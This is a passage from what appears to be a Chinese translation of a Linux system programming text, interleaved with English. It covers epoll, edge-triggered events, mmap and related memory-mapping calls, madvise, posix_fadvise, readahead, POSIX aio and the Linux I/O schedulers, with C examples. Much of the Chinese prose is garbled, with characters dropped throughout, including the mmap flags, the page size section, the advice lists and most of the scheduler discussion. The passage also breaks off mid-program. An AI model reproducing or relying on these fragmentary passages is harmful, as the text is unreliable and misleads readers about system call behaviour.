注意,当 op 为 EPOLL_CTL_DEL 时并不需要事件掩码,event 参数本可以为 NULL。但在 2.6.9 之前的内核版本中,该参数会被检查是否非空,因此为了兼容旧内核,必须传递一个合法的非 NULL 指针。2.6.9 内核修复了这个 bug。
4.2.3 等待 Epoll 事件
epoll wait() 给 epoll 实的文件上的件
#include <sys/epoll.h>
int epoll_wait (int epfd, struct epoll_event
*events, int maxevents, int timeout);
对 epoll wait() 的调 epoll 实 epfd 的文件 fd 上的件时
timeout 。 events epoll event (
件) 的内存以 maxevents 件。件出
出错时返回 -1,并把 errno 设置为以下值:
EBADF   epfd 是一个非法的文件描述符。
EFAULT  进程对 events 指向的内存没有写权限。
EINTR   系统调用在完成之前被信号中断。
EINVAL  epfd 不是一个合法的 epoll 实例,或 maxevents 小于等于 0。
如果 timeout 为 0,即使没有事件发生,调用也会立即返回,此时返回值为 0。如果 timeout 为 -1,调用将一直阻塞到有事件发生。
调用返回时,epoll_event 结构体的 events 字段描述了发生的事件,data 字段保留了用户在调用 epoll_ctl() 之前设置的全部内容。
的 epoll wait() 子
#define MAX_EVENTS 64
struct epoll_event *events;
int nr_events, i, epfd;
events = malloc (sizeof (struct epoll_event) *
MAX_EVENTS);
if (!events) {
perror (”malloc”);
return 1;
}
nr_events = epoll_wait (epfd, events, MAX_EVENTS,
-1);
if (nr_events < 0) {
perror (”epoll_wait”);
free (events);
return 1;
}
for (i = 0; i < nr_events; i++) {
printf (”event=%ld on fd=%d\n”,
events[i].events, events[i].data.fd);
/*
* We now can, per events[i].events, operate on
– 100 –
4
文件 I/O
* events[i].data.fd without blocking.
*/
}
free (events);
We will cover malloc() and free() in Chapter 8.
4.2.4 边沿触发事件和水平触发事件
If the events field of the event parameter passed to epoll_ctl() has the EPOLLET value set, the watch on fd is edge-triggered, as opposed to level-triggered. Consider the following exchange between a producer and a consumer communicating over a Unix pipe:

1. The producer writes 1 KB of data onto the pipe.
2. The consumer calls epoll_wait() on the pipe, waiting for the pipe to contain data and thus be readable.

With a level-triggered watch, the call to epoll_wait() in step 2 will return immediately, showing that the pipe is ready to read. With an edge-triggered watch, the call will not return until after step 1 occurs. That is, even if the pipe is readable at the invocation of epoll_wait(), the call will not return until the data is written onto the pipe.

Level-triggered is the default behavior. It is how poll() and select() behave, and it is what most developers expect. Edge-triggered behavior requires a different approach to programming, commonly utilizing nonblocking I/O and careful checking for EAGAIN.

The terminology comes from electrical engineering. A level-triggered interrupt is issued whenever a line is asserted; an edge-triggered interrupt is issued only when the line's state changes. Level-triggered interrupts are useful when the state of an event is of interest; edge-triggered interrupts are useful when the event itself is of interest.
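Putting this together, a helper can switch a descriptor to nonblocking mode and register it edge-triggered in one step. This is a sketch under our own naming; watch_edge_triggered is not a system interface:

```c
#include <assert.h>
#include <fcntl.h>
#include <sys/epoll.h>
#include <unistd.h>

/* Register fd with the epoll instance epfd for edge-triggered
 * reads. Edge-triggered consumers should use nonblocking I/O and
 * read until EAGAIN, so O_NONBLOCK is set on the fd as well. */
int watch_edge_triggered (int epfd, int fd)
{
        struct epoll_event ev;
        int flags;

        flags = fcntl (fd, F_GETFL);
        if (flags == -1 || fcntl (fd, F_SETFL, flags | O_NONBLOCK) == -1)
                return -1;

        ev.events = EPOLLIN | EPOLLET;
        ev.data.fd = fd;
        return epoll_ctl (epfd, EPOLL_CTL_ADD, fd, &ev);
}
```

After a write arrives on the watched descriptor, a single edge event is reported; the consumer must then drain the descriptor until read() returns EAGAIN.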
4.3 存储映射
As an alternative to standard file I/O, the kernel provides an interface that allows an application to map a file into memory, meaning that there is a one-to-one correspondence between a memory address and a word in the file. The programmer can then access the file directly through memory, identically to any other chunk of memory-resident data; it is even possible to allow writes to the memory region to transparently map back to the file on disk.

Linux implements the POSIX.1 mmap() system call, which maps objects into memory. This section discusses mmap() as it pertains to mapping files into memory to perform I/O; in Chapter 8, we will visit other applications of this system call.
4.3.1 mmap()
A call to mmap() asks the kernel to map len bytes of the object represented by the file descriptor fd, starting at offset bytes into the file, into memory. If addr is included, it indicates a preference to use that starting address in memory. The access permissions are dictated by prot, and additional behavior can be given by flags:
#include <sys/mman.h>

void * mmap (void *addr, size_t len, int prot, int flags, int fd, off_t offset);
The addr parameter offers the kernel a suggestion of where best to map the file. It is only a hint; most users pass 0. The call returns the actual address in memory where the mapping begins.

The prot parameter describes the desired memory protection of the mapping. It may be either PROT_NONE, in which case the pages in this mapping may not be accessed at all (making little sense!), or a bitwise OR of one or more of the following flags:

PROT_READ   The pages may be read.
PROT_WRITE  The pages may be written.
PROT_EXEC   The pages may be executed.
的存能文件的式。程以
读方式文件 prot 能设 PROT WRITE。
性
POSIX (读写
的子集。实对处理读。
处理能读。操作上 PROT READ 即
PROT EXEC。 x86 的。
然的处理方式程。的程们
映射的时相的设 PROT EXEC。
出的原即映射
操作处理映射的。
x86 处理 NX(no-execute读的
映射。新的上 PROT READ 同 PROT EXEC。
The flags argument describes the type of mapping, and some elements of its behavior. It is a bitwise OR of the following values:
MAP FIXED
mmap() addr 作性。内
映射文件调。的
内存映射的原内然
新内。进程的空间
以。
MAP PRIVATE 映射。文件映射写时进程对内存的何
真的文件或进程的映射。
MAP SHARED 映射文件的进程映射内存。对内存的写操
作效写文件。读映射进程的写操作的
。
MAP SHARED MAP PRIVATE 能同时。更
的将 8 。
映射文件的时。映
射文件文件的进程然以文件。映射或进程
时对的文件 1。
As an example, the following snippet maps the file backed by fd, beginning with its first byte and extending for len bytes, into a read-only mapping:

void *p;

p = mmap (0, len, PROT_READ, MAP_SHARED, fd, 0);
if (p == MAP_FAILED)
        perror ("mmap");
Figure 4-1 shows the effects of the parameters supplied with mmap() on the mapping between a file and a process's address space.
4.3.1.1 页大小
页内存同的小单。页内存映射的
同时进程空间的。
mmap() 调操作页。 addr offset 页小对。
们页小的。
以映射的页。 len 能页对(能
映射的文件小页小的映射空页。出
的内存即效映射的 0 . 的读
Figure 4-1. Mapping a file into a process's address space
操作将 0。即 MAP SHARED 进写操作文
件。 len 写文件。
sysconf(): POSIX 的页小方 sysconf()将
的
#include <unistd.h>
long sysconf (int name);
调 sysconf() name 的 name 效 -1。出时 errno
设 EINVAL。 -1 对能效( limits -1 示
。的调空 errno调。
POSIX SC PAGESIZE(SC PAGE SIZE 同小页
的小。页小
long page_size = sysconf (_SC_PAGESIZE);
getpagesize():Linux 提 getpagesize() 页小
#include <unistd.h>
int getpagesize (void);
A call to getpagesize() returns the size of a page, in bytes. Usage is even simpler than sysconf():

int page_size = getpagesize ();
Not all Unix systems support this function; it was dropped from the POSIX 1003.1-2001 standard. It is included here for completeness.
PAGE_SIZE: The page size is also stored statically in the macro PAGE_SIZE, which is defined in <asm/page.h>. A third way to obtain the page size is thus:

int page_size = PAGE_SIZE;
Unlike the first two options, however, this approach retrieves the page size at compile time, not at runtime. Some architectures support multiple machine types with different page sizes, and some machine types even support multiple page sizes themselves. A single binary should be able to run on all machine types in a given architecture, so hardcoding the page size kills that possibility. The correct approach is to determine the page size at runtime; because addr and offset are usually 0, this requirement is not overly difficult to meet.

Moreover, future kernel versions will likely not export this macro to user space. We cover it here because of its frequent presence in legacy Unix code, but you should not use it in your own programs; sysconf() is your best bet.
4.3.1.2 返回值和错误码
On success, a call to mmap() returns the location of the mapping. On failure, the call returns MAP_FAILED and sets errno appropriately. A call to mmap() never returns 0.

Possible errno values include:

EACCES     The given file descriptor is not a regular file, or the mode in which it was opened conflicts with prot or flags.
EAGAIN     The file has been locked via a file lock.
EBADF      The given file descriptor is not valid.
EINVAL     One or more of the parameters addr, len, or off are invalid.
ENFILE     The system-wide limit on open files has been reached.
ENODEV     The filesystem on which the file to map resides does not support memory mapping.
ENOMEM     The process does not have enough memory.
EOVERFLOW  The result of addr + len exceeds the size of the address space.
EPERM      PROT_EXEC was given, but the file resides on a filesystem mounted no-exec.
4.3.1.3 相关信号
Two signals are associated with mapped regions:

SIGBUS   Generated when a process attempts to access a region of a mapping that is no longer valid — for example, because the file was truncated after it was mapped.
SIGSEGV  Generated when a process attempts to write to a region that is mapped read-only.
4.3.2 munmap()
Linux provides the munmap() system call for removing a mapping created with mmap():

#include <sys/mman.h>

int munmap (void *addr, size_t len);

A call to munmap() removes any mappings that contain pages located anywhere in the process address space starting at addr, which must be page-aligned, and continuing for len bytes. Once the mapping has been removed, the previously associated memory region is no longer valid, and further access attempts generate a SIGSEGV signal.

Normally, munmap() is passed the return value and the len parameter from a previous invocation of mmap().

On success, munmap() returns 0; on failure, it returns -1, and errno is set appropriately. The only standard errno value is EINVAL, which specifies that one or more parameters were invalid.

As an example, the following snippet unmaps any memory regions with pages contained in the interval [addr, addr + len]:

if (munmap (addr, len) == -1)
        perror ("munmap");
4.3.3 存储映射例子
Consider the following example program, which uses mmap() to print a file chosen by the user to standard out:
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
int main (int argc, char *argv[])
{
        struct stat sb;
        off_t len;
        char *p;
        int fd;

        if (argc < 2) {
                fprintf (stderr, "usage: %s <file>\n", argv[0]);
                return 1;
        }

        fd = open (argv[1], O_RDONLY);
        if (fd == -1) {
                perror ("open");
                return 1;
        }

        if (fstat (fd, &sb) == -1) {
                perror ("fstat");
                return 1;
        }

        if (!S_ISREG (sb.st_mode)) {
                fprintf (stderr, "%s is not a file\n", argv[1]);
                return 1;
        }

        p = mmap (0, sb.st_size, PROT_READ, MAP_SHARED, fd, 0);
        if (p == MAP_FAILED) {
                perror ("mmap");
                return 1;
        }

        if (close (fd) == -1) {
                perror ("close");
                return 1;
        }

        for (len = 0; len < sb.st_size; len++)
                putchar (p[len]);

        if (munmap (p, sb.st_size) == -1) {
                perror ("munmap");
                return 1;
        }

        return 0;
}
The only unfamiliar system call in this example should be fstat(), which we will cover in Chapter 7. All you need to know at this point is that fstat() returns information about a given file. The S_ISREG() macro can check some of this information, so that we can ensure the given file is a regular file — as opposed to a device file or a directory — before we map it. The behavior of mapping a nonregular file depends on the backing device: some device files are mmap-able, while others are not, setting errno to EACCES.

The rest of the example should be straightforward. The program is passed a filename as an argument. It opens the file, ensures it is a regular file, maps it, closes it, prints the file byte-by-byte to standard out, and then unmaps the file from memory.
4.3.4 mmap() 的优点
Manipulating files via mmap() has a handful of advantages over the standard read() and write() system calls:

• Reading from and writing to a memory-mapped file avoids the extraneous copy that occurs when using read() or write(), where the data must be copied to and from a user-space buffer.
• Aside from any potential page faults, reading from and writing to a memory-mapped file does not incur any system call or context switch overhead. It is as simple as accessing memory.
• When multiple processes map the same object into memory, the data is shared among all the processes. Read-only and shared writable mappings are shared in their entirety; private writable mappings share their not-yet-copied (copy-on-write) pages.
• Seeking around the mapping involves trivial pointer manipulations; there is no need for the lseek() system call.

For these reasons, mmap() is a smart choice for many applications.
4.3.5 mmap() 的缺陷
Keep the following points in mind when using mmap():

• Memory mappings are always an integer number of pages in size. Thus, the difference between the size of the backing file and an integer number of pages is wasted as slack space. For small files, a significant percentage of the mapping may be wasted; for example, with 4 KB pages, a 7-byte mapping wastes 4,089 bytes.
• The memory mappings must fit into the process's address space. With a 32-bit address space, a very large number of various-sized mappings can fragment the address space, making it hard to find large free contiguous regions. This problem is much less apparent with a 64-bit address space.
• There is overhead in creating and maintaining the memory mappings and associated data structures inside the kernel. This overhead is generally obviated by the elimination of the double copy mentioned in the previous section, particularly for larger and frequently accessed files.

For these reasons, the benefits of mmap() are most greatly realized when the mapped file is large (so that any wasted space is a small percentage of the total mapping), or when the total size of the mapped file is evenly divisible by the page size (so that there is no wasted space).
4.3.6 调整映射的大小
Linux 提 mremap() 扩或映射的小。 Linux
的
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/mman.h>
void * mremap (void *addr, size_t old_size,
size_t new_size, unsigned long flags);
mremap() 将映射 [addr, addr + old size) 的小或 new size。
进程空间的小 flags内以同时映射。
[示。) 示
作间 (interval notation)。
flags 的以 0 或 MREMAP MAYMOVE
调的小内以映射
。内以映射的小调操作
能。
4.3.6.1 返回值和错误码
调 mremap() 新 映 射 的 。
MAP FAILED设 errno 以
EAGAIN
内存能调小。
EFAULT
给内的页进程空间内的效页或新映
射给页时出。
EINVAL
效。
ENOMEM 给进扩展(MREMAP MAYMOVE
设或进程空间内空空间。
glibc mremap() 实效的 realloc()以调
malloc() 的内存。
void * realloc (void *addr, size_t len)
{
        size_t old_size = look_up_mapping_size (addr);
        void *p;

        p = mremap (addr, old_size, len, MREMAP_MAYMOVE);
        if (p == MAP_FAILED)
                return NULL;
        return p;
}
段 malloc() 操作的映射时效即段
能作展示提性能的。子设程写
look up mapping size() 。 GNU C library mmap() 及相进
内存。我们将更的。
4.3.7 改变映射区域的权限
POSIX mprotect()程内存的
#include <sys/mman.h>

int mprotect (const void *addr, size_t len, int prot);
A call to mprotect() changes the protection for the memory pages contained in [addr, addr + len), where addr is page-aligned. The prot parameter accepts the same values as the prot given to mmap(): PROT_NONE, PROT_READ, PROT_WRITE, and PROT_EXEC. These values are not additive; if a region of memory is readable, and prot is set to only PROT_WRITE, the call will make the region only writable.

On some systems, mprotect() may operate only on memory mappings previously created via mmap(). On Linux, mprotect() may operate on any region of memory.
4.3.7.1 返回值和错误码
调 mprotect() 0。 -1设 errno
EACCES  The memory cannot be given the permissions requested by prot. This can occur, for example, if you attempt to make writable the mapping of a file that was opened read-only.
EINVAL
addr 效或页对。
ENOMEM 内空间满或内页进程
空间内的效。
4.3.8 使用映射机制同步文件
POSIX 提存映射 fsync() 的调
#include <sys/mman.h>
int msync (void *addr, size_t len, int flags);
调 msync() 以将 mmap() 的映射内存的何写
同步内存的映射映射的文件的的。文件或文件
子集内存的映射 addr 的 len 写。 addr
页对的上 mmap() 调的。
调 msync()映射的映射写
。 write() 同 write() 的存
写。写内存映射时进程内页存的文件页
内。内同步页存。
The flags parameter fine-tunes the behavior of the synchronization. It is a bitwise OR of the following values:
MS_ASYNC       Specifies that synchronization should occur asynchronously. The update is scheduled, but msync() returns immediately without waiting for the writes to take place.
MS_INVALIDATE  Specifies that all other cached copies of the mapping be invalidated. Any future access to any mappings of this file will reflect the newly synchronized on-disk data.
MS_SYNC        Specifies that synchronization must occur synchronously. msync() will not return until all pages are written back to disk.

Either MS_ASYNC or MS_SYNC must be specified, but not both.
Usage is simple:

if (msync (addr, len, MS_ASYNC) == -1)
        perror ("msync");
This example asynchronously synchronizes the file mapped in the region [addr, addr + len) to disk.
4.3.8.1 返回值和错误码
调 msync() 0。调 -1设 errno 相。以
errno 的效
EINVAL
flags 同时设 MS SYNC MS ASYNC设以上
的或页对。
ENOMEM 的 内 存 (或 映 射。 POSIX
Linux 同 步 映 射 的 内 存 时将
ENOMEM能同步效的。
2.4.29 的内 msync() EFAULT ENOMEM。
4.3.9 映射提示
Linux 提 madvise() 调以进程何映射上给内
的提示。内自的更的映射。内
调自的即提示时能的性
能的提示以的存的
读。
调示内何对 addr len 的内存映射进
操作。
#include <sys/mman.h>
int madvise (void *addr, size_t len, int advice);
len 0内将对 addr 的映射提示。
advice 以
MADV NORMAL
对给的内存程提示方
式操作。
MADV RANDOM
程将以的页。
MADV SEQUENTIAL 程的
页。
MADV WILLNEED
程将的页。
MADV DONTNEED
程内内的页。
内提示真的的实相的 POSIX
提示的的。 2.6 内以方式进处理
MADV NORMAL
内进程的读。
MADV RANDOM
内读理读操作读小的。
MADV SEQUENTIAL 内读。
MADV WILLNEED
内将给的页读内存。
MADV DONTNEED
内给页相的
的同步写的页。对映射
新内存。
As an example, the following snippet advises the kernel that the process expects to access the memory region [addr, addr + len) sequentially:

int ret;

ret = madvise (addr, len, MADV_SEQUENTIAL);
if (ret < 0)
        perror ("madvise");
读
Linux 内上的文件时周的读 (reada-
head) 自的操作。文件的内时内
读内的。对的(
文件时内以上。 (自读
)文件布的的的。
读处的的效读的程。的
读文件时效对读的。
我们的内内的内的调
读以读的率。率
的读提示小的读。程以
madvise() 调读的小。
4.3.9.1 返回值和错误码
调 madvise() 0时 -1设 errno 相。以
效
EAGAIN
内内 (能内存) 进程以。
EBADF
存映射文件。
EINVAL
len 的 addr 页对的 advice 效或页
或以 MADV DONTNEED 方式.
EIO
MADV WILLNEED 操作时的内 I/O 。
ENOMEM 给 的 进 程 空 间 的 效 映 射或 设
MADV WILLNEED内存。
4.4 普通文件 I/O 提示
上小我们何给内提存映射的操作提示。我
们将文件 I/O 时何给内提操作提示。 Linux 提满
的 posix fadvise() readahead()。
4.4.1 posix fadvise()
的 POSIX 1003.1-2003
#include <fcntl.h>

int posix_fadvise (int fd, off_t offset, off_t len, int advice);
调 posix fadvise() 给出内文件 fd 的 [offset, offset + len) 内操作
提示。 len 0提示作间 [offset, length of file]。设
len offset 0设文件。
advice 的 madvise() 。的以的:
POSIXFADV NORMAL
程 给 文 件 的 给
处理。
POSIX FADV RANDOM
程给内。
POSIX FADV SEQUENTIAL 程给内
。
POSIX FADV WILLNEED
程能。
POSIX FADV NOREUSE
程能给
。
POSIX FADV DONTNEED
程能给。
madvise() 内对提示的处理同的实
同的 Linux 内的处理方式相同。内的处理方式:
POSIX FADV NORMAL
内的读。
POSIX FADV RANDOM
内读理读操作能的读
的。
POSIX FADV SEQUENTIAL 内读读读的。
POSIX FADV WILLNEED
内读将页读内存。
POSIX FADV NOREUSE
POSIX FADV WILLNEED ;
内能将” ” 的
。 madvise 对的。
POSIX FADV DONTNEED
内存的。同
madvise() 对。
As an example, the following snippet instructs the kernel that the entire file associated with the file descriptor fd will be accessed in a random, nonsequential manner:

int ret;

ret = posix_fadvise (fd, 0, 0, POSIX_FADV_RANDOM);
if (ret == -1)
        perror ("posix_fadvise");
4.4.1.1 返回值和错误码
调 0 -1设 errno
EBADF
文件效。
EINVAL advice 效文件或设给
的文件。
4.4.2 readahead() 系统调用
posix fadvise() 2.6 内新的调。 readahead()
以 posix fadvise() POSIX FADV WILLNEED 时同的能。
同 posix fadvise() 的 readahead() Linux 的
#include <fcntl.h>

ssize_t readahead (int fd, off64_t offset, size_t count);
A call to readahead() populates the page cache with the region [offset, offset + count) of the file given by fd.
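For example, a program that knows it will shortly read the head of a file can prime the page cache first. A small sketch follows; prefetch_head is our own helper name, and the 64 KB figure is an arbitrary choice:

```c
#define _GNU_SOURCE             /* readahead() is Linux-specific */
#include <assert.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

/* Ask the kernel to populate the page cache with the first 64 KB
 * of fd; a later read() of that range should then hit the cache. */
int prefetch_head (int fd)
{
        return readahead (fd, 0, 64 * 1024);
}
```

Because readahead() only schedules page cache population, it returns quickly and the actual disk I/O proceeds in the background.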
4.4.2.1 返回值和错误码
调 0 -1设 errno
EBADF
文件效
EINVAL 文件对的文件读。
4.4.3 “经济实用“的操作提示
内操作提示的效率以提。
对的 I/O 。处理的
的提示的上的提的。
读 文 件 的 内 时进 程 以 设
POSIX FADV WILLNEED 内文件读页存。 I/O 操作将
异步进。文件时操作以即
。
相的读或写 (上的)进程
以设 POSIX FADV DONTNEED 内存的内。的操
作满页。进程页
的空间存的。对
的的将存。
进 程 读 文 件 时设 POSIX FADV SEQUENTIAL
内 读。相 的 进 程 自 将 文 件设
POSIX FADV RANDOM内读的。
4.5 同 步 (Synchronized),同 步 (Synchronous) 及 异 步 ( Asyn-
chronous) 操作
: synchronized synchronous 同 步
我们对同步的相的文原文。
Unix 操作同步 (synchronized)同步 (nonsynchronized)同
步 (synchronous)异步 (asynchronous) 时的
( synchronized synchronous 间的小)。
同步 (synchronous) 写操作写内的。同
步(synchronous读操作写程空间的
的。相的异步 (asynchronous写操作空间时能
; 异步(asynchronous) 读操作备能。操
作操作以进。然的
操作以及的程。
同步的 (synchronized) 操作同步 (synchronous) 操作的更
更。同步的(synchronized写操作写上的
内的同步的。同步 (synchronized) 的读操作新的 (
能读)。
的同步(synchronous异步(asynchronous I/O 操作
件 (的存) 。同步 (synchronized) 异
步(asynchronized件 (写)。
Unix systems' write operations have historically been synchronous and nonsynchronized; their read operations have been synchronous and synchronized.* For write operations, every combination of these characteristics is possible, as Table 4-1 shows.
Table 4-1. The synchronicity of write operations

               Synchronized                                 Nonsynchronized
Synchronous    The write operation does not return          The write operation does not return
               until the data is flushed to disk. This      until the data is stored in a kernel
               is the behavior if O_SYNC is specified       buffer. This is the usual behavior.
               during file open.
Asynchronous   The write operation returns as soon as       The write operation returns as soon as
               the request is queued. Once the write        the request is queued. Once the write
               operation ultimately executes, the data      operation ultimately executes, the data
               is guaranteed to be on disk.                 is guaranteed to at least be stored in
                                                            a kernel buffer.
Reads are always synchronized. A read operation may, however, be synchronous or asynchronous, as Table 4-2 shows.

Table 4-2. The synchronicity of read operations

               Synchronized
Synchronous    The read operation does not return until the data, which is up-to-date, is
               stored in the provided buffer (this is the usual behavior).
Asynchronous   The read operation returns as soon as the request is queued, but when the read
               operation ultimately executes, the data returned is up-to-date.
Earlier in this chapter, we discussed how to make write operations synchronized (via the O_SYNC flag), and how to ensure that all I/O is synchronized as of a given point (via fsync() and friends). Now let's look at making reads and writes asynchronous.
4.5.1 异步 I/O
异步 (asynchronous)I/O 内的。 POSIX 1003.1-2003
aio 的 Linux 实 aio。 aio 提实异步
I/O 提以及时。
* Reads are technically also nonsynchronized, like writes, but the kernel guarantees that the page cache contains up-to-date data: the data in the page cache is always identical to or newer than the data on disk. In this manner, the behavior in practice is always synchronized.

#include <aio.h>

/* asynchronous I/O control block */
struct aiocb {
        int aio_fildes;               /* file descriptor */
        int aio_lio_opcode;           /* operation to perform */
        int aio_reqprio;              /* request priority offset */
        volatile void *aio_buf;       /* pointer to buffer */
        size_t aio_nbytes;            /* length of operation */
        struct sigevent aio_sigevent; /* signal number and value */

        /* internal, private members follow... */
};

int aio_read (struct aiocb *aiocbp);
int aio_write (struct aiocb *aiocbp);
int aio_error (const struct aiocb *aiocbp);
ssize_t aio_return (struct aiocb *aiocbp);
int aio_cancel (int fd, struct aiocb *aiocbp);
int aio_fsync (int op, struct aiocb *aiocbp);
int aio_suspend (const struct aiocb * const cblist[], int n, const struct timespec *timeout);
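To give a feel for the interface, here is a sketch that submits one asynchronous read and then polls for completion with aio_error(). Production code would block in aio_suspend() instead of spinning, and older glibc versions require linking with -lrt; the helper name aio_read_blocking is our own:

```c
#include <aio.h>
#include <assert.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Submit an asynchronous read of len bytes from the start of fd
 * into buf, then poll until it completes. Returns the number of
 * bytes read, or -1 on error. */
ssize_t aio_read_blocking (int fd, void *buf, size_t len)
{
        struct aiocb cb;

        memset (&cb, 0, sizeof (cb));
        cb.aio_fildes = fd;
        cb.aio_buf = buf;
        cb.aio_nbytes = len;

        if (aio_read (&cb) == -1)
                return -1;

        while (aio_error (&cb) == EINPROGRESS)
                ;       /* spin; real code would use aio_suspend() */

        return aio_return (&cb);
}
```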
4.5.1.1 基于线程的异步 I/O
Linux O DIRECT 的文件上的 aio。设
O DIRECT 的文件上 aio我们自实。内的
我们能实异步 I/O实相的效。
我们将程的异步 I/O
• 实 I/O
• 离内的 I/O I/O 提操作时。
性能的。 I/O 操作出 I/O 超
的进程 I/O 。程的
处理 I/O 的方式。
的的方式程 (调将)。方
:
1. 程处理的 I/O。
2. 实将 I/O 操作工作的。
3. 的 I/O 相的 I/O 操作。工作
程的 I/O 提内们。
4. 操作的 (读的)
。
5. 实的的 I/O
操作。
POSIX 的 aio 的相的程理的
。
4.6 I/O 调度器和 I/O 性能
的性能。
性能的 seek 操作的时程的
。操作以处理周 ( 1/3 ) 的
时单的 seek 操作 8 的时间
cpu 周的 2500 。
的性能我们 I/O 操作
们将原效的。操作内实 I/O
调理 I/O 的离小。
I/O 调将的性能小。
4.6.1 磁盘寻址
理 I/O 调的工作。
(cylinders) (heads) (section) 何方式方
式 CHS 。
、读写。以作 CD上
作 CD。的 CD 上。
。
单上的程:
。上。
上。上离
相同离的。的 (即的)。
单上的单。然上的
。。然
读写的上的的读写。
的操作的、。
将 / / 的映射的 (理或设备
)更的映射的。操作以 (即
(LBA)程的 CHS ∗。
自然的 CHS 的映射的: 理 n n + 1 理上相的。
我们将的映射的。
文件存件。们操作自的操作单即 (时
作文件或)。的小理小的。
文件的映射或理。
4.6.2 调度器的功能
I/O 调实操作 (merging) (sorting)。 (merg-
ing) 操作将或相的 I/O 的程。
读 5 读 6 7 上的。对 5 7
的操作。的 I/O 能 I/O 的。
(sorting) 操作相对更的的
新的 I/O 。 I/O 操作 52 109 7 I/O 调
以 7 52 109 的进. 81
将 52 109 的间。 I/O 调然们的
调:7然 52然 81 109。
方式的离小。的 (
的进)以、性的方式。 I/O 操作
∗绝对上程上上的
的进操作以 I/O 性能提。
4.6.3 改进读请求
读新的。的页存
时读读出能相的操
作。我们将性能读 (read latency)。
的程能时 I/O 。进同
步的将。我们读的文
件。程文件读然读段
文件读。然进程读文件。的
进的: 以。
写 (同步的) 的对写时间内
何 I/O 操作。空间程写操作性能的。写
操作读操作的时: 写操作的们
以内的。的 writes-starving-reads 。
I/O 调以的对能的对
的。我们的子。新的
50-60 间的 109 的将调。读的
能性能。以 I/O 调” ” 的
。
单的方 2.4 内 Linux 调∗方
的的新的。上以
对读的时读 (read latency)。
方单。 2.6 内 Linus 调
新的调。
4.6.3.1 Deadline I/O 调度器
Deadline I/O 调 2.4 调程及的调的
。 Linus 的 I/O 。的 I/O
调的。 Deadline I/O 调进步进原
的调新的: 读 FIFO 写 FIFO 。的
∗Linus 以自的调。的
以。
提时间。读 FIFO 读同写 FIFO
写。 FIFO 的设时间。读 FIFO
的时间设 500 。写 5 。
新的 I/O 提然相
(读或写) 的。的 I/O 。
的 (linus 调)以小
。
FIFO 的超出的时间时 I/O 调
I/O 调调 FIFO 的。 I/O 调程
处理的时间的。
方式 Deadline I/O 调 I/O 上。然能
时间调 I/O 时间调。
Deadline I/O 调能提的的
时间。读更小的时间 writes-starving-reads 的
。
4.6.3.2 Anticipatory I/O 调度器
Deadline I/O 调。我们读
的。 Deadline I/O 调时读的的
时间或上时将然 I/O 调程处理
I/O 。时。设然提读
的即将时间 I/O 调的
然处理。的能
件能的。小时的
处理读上以的。能
读处理的性能将的
提。的程调提的读 I/O 调
。
对的读时然出 – 读
程备提读时
I/O 调程处理的。时进
的操作: 读。存方 I/O 调对
同的将提以的读
进。的时间的的。
anticipatory I/O 调的工作原理的。 Deadlne
。读操作提 anticipatory I/O 调的
调。同 Deadline I/O 调的 anticipatory I/O 调
6 。程 6 内对同出读读
anticipatory I/O 调。 6 内读
anticipatory I/O 调然进操作 (处理
的)。的以的时间 (
时间的处理)。读相的
时间。
4.6.3.3 CFQ I/O 调度器
方上 Complete Fair Queuing(CFQ)I/O 调上调
程的相同的。∗ CFQ 时进程自的
时间。 I/O 调程方式处理的
的时间或的处理。 CFQ I/O 调将空
段时间( 10 新的。 I/O 调
操作。效调程处理进程的。
进程的同步(synchronized 的 (读操作)
同步更的。 CFQ 更进读操作
writes-starving-reads 。进程设 CFQ 调对进程
的同时提的性能。
CFQ 调的的。
4.6.3.4 Noop I/O 调度器
Noop I/O 调程单的调。进
操作单的。对的设备上。
∗的文实的 CFQ I/O 调。的原时间或式
以的方式工作。
4.6.4 选择和配置你的 I/O 调度器
的 I/O 调以时以内 iosched 。效
的 as cfq deadline noop。以时对设备进
以 /sys/block/device/queue/scheduler 。读文件以
的 I/O 调上效写文件以更 I/O 调程
。设设备 hda 的 I/O 调程 CFQ以方式
#echo cfq >/sys/block/hda/queue/scheduler
/sys/block/device/queue/iosched 理以设的 I/O 调
相的。 I/O 调。何设 root 。
的程写的程及的 I/O 子。对的
写出更的。
4.6.5 优化 I/O 性能
I/O 相同时 I/O
的 I/O 性能的。
I/O 操作的 (将小的操作聚集的操作)实
对的 I/O或空间 () I/O 的
I/O I/O() 异步 I/O程程的
步。
I/O 操作的程以的性
能。同的即 Linux 内 I/O 调
空间的程以方式实更的性能提。
4.6.5.1 用户空间 I/O 调度
进 I/O 调的 I/O 集的以 Linux I/O 调
的方对的 I/O 进进更的性能提。∗
然 I/O 调将将以
性的方式程? 设提
∗能将 I/O 操作的或上。 I/O 的程 (设
的) 对 I/O 操作进。
的 I/O 。以进 I/O 调的。 I/O 调
对进提
时程提 I/O 。 I/O 调程能的小
的。然
的能的的。
程能布
的提对们提给 I/O 调将
的性能提。
对同的空间的程内同的。 I/O
调的以理的式进。对理进
的。空间以文件文件的式存的。
程文件的布的。
I/O 能以操作的提空间程以
同的处理。们以方式进
1.
2. inode
3. 文件的理
程上的。我们。
。单的效率的的方。
文件的布的文件(同的
子上相布。同的文件间
的时间内相的率更。
文件上的理布。同的
文件然文件同的文件更的率布。
方文件的文件
的作小。即能实的理
。的对文件的。文
件布上的程空间性示。
方实。
inode 。 inode Unix 文件相的的。
文件能理 inode文件小
。我们将 7 更的 inode。:
文件 inode inode 。
inode 更效
文件 i 的 inode < 文件 j 的 inode
文件 i 的理 < 文件 j 的理
对 Unix 的文件 ( ext2 ext3) 的。对真
实的文件何能的 inode (映射)
的。对实上 inode 的文件存能
性。 inode(何映射) 的方。
我们以 stat() 调 inode 更的方我们将
。 I/O 的文件的 inode 然以 inode 的
方式对进。
以示程以出给文件的 inode
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>

/*
 * get_inode - returns the inode of the file associated
 * with the given file descriptor, or -1 on failure
 */
int get_inode (int fd)
{
        struct stat buf;
        int ret;

        ret = fstat (fd, &buf);
        if (ret < 0) {
                perror ("fstat");
                return -1;
        }

        return buf.st_ino;
}

int main (int argc, char *argv[])
{
        int fd, inode;

        if (argc < 2) {
                fprintf (stderr, "usage: %s <file>\n", argv[0]);
                return 1;
        }

